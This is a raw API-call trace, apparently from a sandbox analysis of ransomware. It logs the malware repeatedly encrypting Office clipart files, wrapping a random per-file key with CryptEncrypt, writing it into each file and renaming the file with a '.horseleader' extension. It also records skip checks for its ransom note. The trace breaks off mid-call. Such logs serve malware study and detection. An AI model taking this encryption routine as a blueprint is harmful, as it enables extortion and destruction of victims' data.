[0254.242] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.333] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe04, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01157_.WMF", cAlternateFileName="")) returned 1 [0254.334] lstrcmpiW (lpString1="DD01157_.WMF", lpString2="Windows") returned -1 [0254.334] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 67 [0254.334] StrStrIW (lpFirst="DD01157_.WMF", lpSrch=".horseleader") returned 0x0 [0254.334] lstrcmpW (lpString1="DD01157_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.334] lstrcmpW (lpString1="DD01157_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.334] lstrlenW (lpString=".testttjffg") returned 11 [0254.334] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.334] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.334] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.334] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.338] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 67 [0254.338] StrStrW (lpFirst="DD01157_.WMF", lpSrch=".txt") returned 0x0 [0254.338] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3588) returned 1 [0254.339] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xe04, lpOverlapped=0x0) returned 1 [0254.344] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff1fc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.344] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xe04, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xe04, lpOverlapped=0x0) returned 1 [0254.345] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.345] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.345] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.345] CloseHandle (hObject=0x158) returned 1 [0254.345] GetProcessHeap () returned 0x780000 [0254.345] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.346] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF.horseleader") returned 79 [0254.346] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf.horseleader")) returned 1 [0254.347] GetProcessHeap () returned 0x780000 [0254.347] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.348] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8b4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01160_.WMF", cAlternateFileName="")) returned 1 [0254.348] lstrcmpiW (lpString1="DD01160_.WMF", lpString2="Windows") returned -1 [0254.348] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 67 [0254.348] StrStrIW (lpFirst="DD01160_.WMF", lpSrch=".horseleader") returned 0x0 [0254.348] lstrcmpW (lpString1="DD01160_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.348] lstrcmpW (lpString1="DD01160_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.348] lstrlenW (lpString=".testttjffg") returned 11 [0254.348] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.349] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.349] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.349] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.350] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 67 [0254.350] StrStrW (lpFirst="DD01160_.WMF", lpSrch=".txt") returned 0x0 [0254.350] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2228) returned 1 [0254.350] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x8b4, lpOverlapped=0x0) returned 1 [0254.354] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff74c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.354] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x8b4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x8b4, lpOverlapped=0x0) returned 1 [0254.354] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.355] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.355] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.355] CloseHandle (hObject=0x158) returned 1 [0254.355] GetProcessHeap () returned 0x780000 [0254.355] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.356] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF.horseleader") returned 79 [0254.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf.horseleader")) returned 1 [0254.357] GetProcessHeap () returned 0x780000 [0254.357] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.357] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8fc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01162_.WMF", cAlternateFileName="")) returned 1 [0254.357] lstrcmpiW (lpString1="DD01162_.WMF", lpString2="Windows") returned -1 [0254.357] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 67 [0254.357] StrStrIW (lpFirst="DD01162_.WMF", lpSrch=".horseleader") returned 0x0 [0254.357] lstrcmpW (lpString1="DD01162_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.357] lstrcmpW (lpString1="DD01162_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.357] lstrlenW (lpString=".testttjffg") returned 11 [0254.358] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.358] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.358] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.358] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.359] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 67 [0254.359] StrStrW (lpFirst="DD01162_.WMF", lpSrch=".txt") returned 0x0 [0254.359] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2300) returned 1 [0254.359] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x8fc, lpOverlapped=0x0) returned 1 [0254.361] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff704, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.361] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x8fc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x8fc, lpOverlapped=0x0) returned 1 [0254.362] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.362] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.362] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.362] CloseHandle (hObject=0x158) returned 1 [0254.362] GetProcessHeap () returned 0x780000 [0254.362] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.362] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF.horseleader") returned 79 [0254.363] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf.horseleader")) returned 1 [0254.364] GetProcessHeap () returned 0x780000 [0254.364] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.364] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8fc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01163_.WMF", cAlternateFileName="")) returned 1 [0254.364] lstrcmpiW (lpString1="DD01163_.WMF", lpString2="Windows") returned -1 [0254.364] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 67 [0254.364] StrStrIW (lpFirst="DD01163_.WMF", lpSrch=".horseleader") returned 0x0 [0254.364] lstrcmpW (lpString1="DD01163_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.364] lstrcmpW (lpString1="DD01163_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.364] lstrlenW (lpString=".testttjffg") returned 11 [0254.364] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.364] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.364] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.364] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.365] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 67 [0254.365] StrStrW (lpFirst="DD01163_.WMF", lpSrch=".txt") returned 0x0 [0254.365] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2300) returned 1 [0254.365] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x8fc, lpOverlapped=0x0) returned 1 [0254.368] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff704, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.368] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x8fc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x8fc, lpOverlapped=0x0) returned 1 [0254.368] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.368] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.368] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.368] CloseHandle (hObject=0x158) returned 1 [0254.368] GetProcessHeap () returned 0x780000 [0254.368] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.368] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF.horseleader") returned 79 [0254.369] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01163_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01163_.wmf.horseleader")) returned 1 [0254.370] GetProcessHeap () returned 0x780000 [0254.370] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.370] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x820, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01166_.WMF", cAlternateFileName="")) returned 1 [0254.370] lstrcmpiW (lpString1="DD01166_.WMF", lpString2="Windows") returned -1 [0254.370] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 67 [0254.370] StrStrIW (lpFirst="DD01166_.WMF", lpSrch=".horseleader") returned 0x0 [0254.370] lstrcmpW (lpString1="DD01166_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.370] lstrcmpW (lpString1="DD01166_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.370] lstrlenW (lpString=".testttjffg") returned 11 [0254.370] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.370] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.370] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.370] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.373] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 67 [0254.373] StrStrW (lpFirst="DD01166_.WMF", lpSrch=".txt") returned 0x0 [0254.373] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2080) returned 1 [0254.373] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x820, lpOverlapped=0x0) returned 1 [0254.375] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff7e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.375] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x820, lpOverlapped=0x0) returned 1 [0254.375] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.375] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.376] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.376] CloseHandle (hObject=0x158) returned 1 [0254.376] GetProcessHeap () returned 0x780000 [0254.376] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.376] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF.horseleader") returned 79 [0254.376] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01166_.wmf.horseleader")) returned 1 [0254.377] GetProcessHeap () returned 0x780000 [0254.377] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.377] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x820, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01167_.WMF", cAlternateFileName="")) returned 1 [0254.377] lstrcmpiW (lpString1="DD01167_.WMF", lpString2="Windows") returned -1 [0254.377] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 67 [0254.377] StrStrIW (lpFirst="DD01167_.WMF", lpSrch=".horseleader") returned 0x0 [0254.377] lstrcmpW (lpString1="DD01167_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.377] lstrcmpW (lpString1="DD01167_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.378] lstrlenW (lpString=".testttjffg") returned 11 [0254.378] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.378] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.378] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.378] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.378] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 67 [0254.378] StrStrW (lpFirst="DD01167_.WMF", lpSrch=".txt") returned 0x0 [0254.378] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2080) returned 1 [0254.379] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x820, lpOverlapped=0x0) returned 1 [0254.383] SetFilePointerEx (in: 